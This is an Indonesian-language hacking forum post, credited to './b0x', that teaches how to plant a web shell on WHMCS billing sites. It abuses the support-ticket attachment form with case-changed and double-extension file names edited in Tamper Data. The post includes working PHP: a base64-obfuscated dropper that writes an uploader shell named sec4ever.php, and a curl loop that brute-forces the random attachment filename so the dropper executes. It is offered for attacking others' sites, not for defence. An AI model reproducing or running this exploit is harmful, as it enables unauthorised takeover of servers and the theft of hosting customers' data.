om om cantik.. 
lama ane g bkin post, msh sibuk main fb
okedeh om,. kali ini ane share 1 lagi jalan mnuju whmcs.. mskipun trik ini udah lumayan lama sih,
yaitu dgn menggunakan form upload yg ad di page submitticket pda sbuah whmcs
cara 1 : The Extension PHP Is allowed To Be Uploaded
misalkan target kita http://www.caridigoogle.com/whmcs/submitticket.php
kita bsa liat form upload sprti ini
![[Image: WOR61514.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t_rWqEcLCjPWs2ErBr8tcgdAB429VU4vA6CEwqRDntqnsXVnmOHil45jpji_mVi6V0sJBulFBMtWUuJl8RR8mwbZ1E2xRrgp8cCMUaaQBFi9M=s0-d)
jika kita upload file ext .php maka hasilnya akan sprti ini
![[Image: AKQ64896.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_toMIz6iHmPEwFUbaalFTY-zKJanxSISMuRuMHZ1uHj4rdSDWfU0GMiOzYlWUoUjwlFIfcl6MzhAtXjf0VRAfexrLCx4MtTBjZgKWNR4PQL4aQ=s0-d)
untuk mem-bypass ini, cukup mrubah sdkit ekstensi file kita dgn huruf kapital
misalkan, file kita b0x.php kta ubah sja mnjadi b0x.PHP via tamper data
![[Image: oDZ62191.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uD2ZSPbdhBIQFvSyfJrrchAD85uNdPYyd2s3k4Q2MtpM_Vs_-SgsKWCUwegknUs8PGPC3O7frrZZR5bjxXFN2--_SqP-SRsWmZMPYbFYuHEQ=s0-d)
skrang submit
![[Image: wh162273.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tHkrrBQe8YVMT4MafxMWYOBiaInAHgdXuqs_7uIGBMvtwMKUkkRDgTd67xbubX7ooHEyCcSQigiYs5koUzYFeVn0PaUVFDwK5yxcAewFKJww=s0-d)
cara 2 : PHP Extension Is not Allowed To Be uploaded on WHMCS
coba lihat ini
dsana kta bsa liat file dgn ekstensi .rar dapat di upload
msh dgn mnggunakan tamper data,. kita tambah ekstensi file dgn .rar
![[Image: tSi62460.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u_ytWSlOFZiFWo9LCsPQBzpRGJf0jUFnqY5lzi2F-kBad90WtATmf8JoHaUGcyi8CA77c45OOweqfSlXrKqKfgKiK0-G_3qZta_gVflBZqINI=s0-d)
b0x.PHP.rar has been uploaded
![[Image: hlj62514.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v_UKQIpyLjGTq-0BZn3ejZuV0tk-wowP75mCe245QbU3IdIkOh4pn6bwVeCMnao8Yy2RhRW04gElDvOB9ZT3GwWaMZA8MXPvFYMjhyjBlpPA=s0-d)
di whmcs, File secara otomatis akan Berganti nama jdi sperti ini
Quote:number_filename.extensionmsalkan file kita b0x.PHP akan mnjadi sprti ini
Quote:RandomNumber_b0x.PHPtp dsini kta tdk bsa mngetahui RandomNumber karena itu adalah angka acak
untuk mndapatkan RandomNumber, mari kita saksikan.
Let's Make Small Summery
This Code Must be As Attach File
This is uploader Script Will be Opened In The Same Folde - attachments -
Now Upload it as Before Via .PHP or non-defined
After That ,, Use This Code To Generate / Browse Site And get Uploader in sec4ever.php
Edit The Variables To Get The Correct Result - 3xPecteD
Then When The Script Ends Browsing URL'z Via Auto-Generate By For Function
The Script Will Browse Your PHP Code But You'll No Be Able To Know What is the Number
But The Script Will Generate Shell/Uploader in Sec4ever.php
![[Image: q8O63187.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tTN-_6M1hFJpOv4Ug9AwOKHP7J-fbpFaO7XIrJ1l5PxTvDbitQsFTRxsVFPnfvSumE9bRoIznFcE61CaciQLkC4Yj62NW0o5mTXd65lRkKH0Q=s0-d)
This Code Must be As Attach File
Code:
<?php
$shellcode = "PD9waHANCmVjaG8gJzxiPjxicj48YnI+Jy5waHBfdW5hbWUoKS4nPGJyPjwvYj4nOw0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgew0KCWlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBTVUtTRVMgISEhPC9iPjxicj48YnI+JzsgfQ0KCWVsc2UgeyBlY2hvICc8Yj5VcGxvYWQgR0FHQUwgISEhPC9iPjxicj48YnI+JzsgfQ0KfQ0KPz4=";
$b0x = fopen("sec4ever.php","w");
fwrite($b0x,base64_decode($shellcode));
?>This is uploader Script Will be Opened In The Same Folde - attachments -
Now Upload it as Before Via .PHP or non-defined
After That ,, Use This Code To Generate / Browse Site And get Uploader in sec4ever.php
Code:
<?
error_reporting(0);
$url = "http://domain.tld/whmcs/";
$attachfolder = "attachments";
$attach= "b0x.PHP";
for($b0x=100000; $b0x<1000000;$b0x++){
$urls = "$url/$attachfolder/$b0x"; $urls.="_$attach";
$ch = @curl_init();
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt($ch, CURLOPT_URL, $urls );
$result = @curl_exec($ch);
@curl_close($ch);
}
?>Then When The Script Ends Browsing URL'z Via Auto-Generate By For Function
The Script Will Browse Your PHP Code But You'll No Be Able To Know What is the Number
But The Script Will Generate Shell/Uploader in Sec4ever.php
moga berguna.
credit : ./b0x
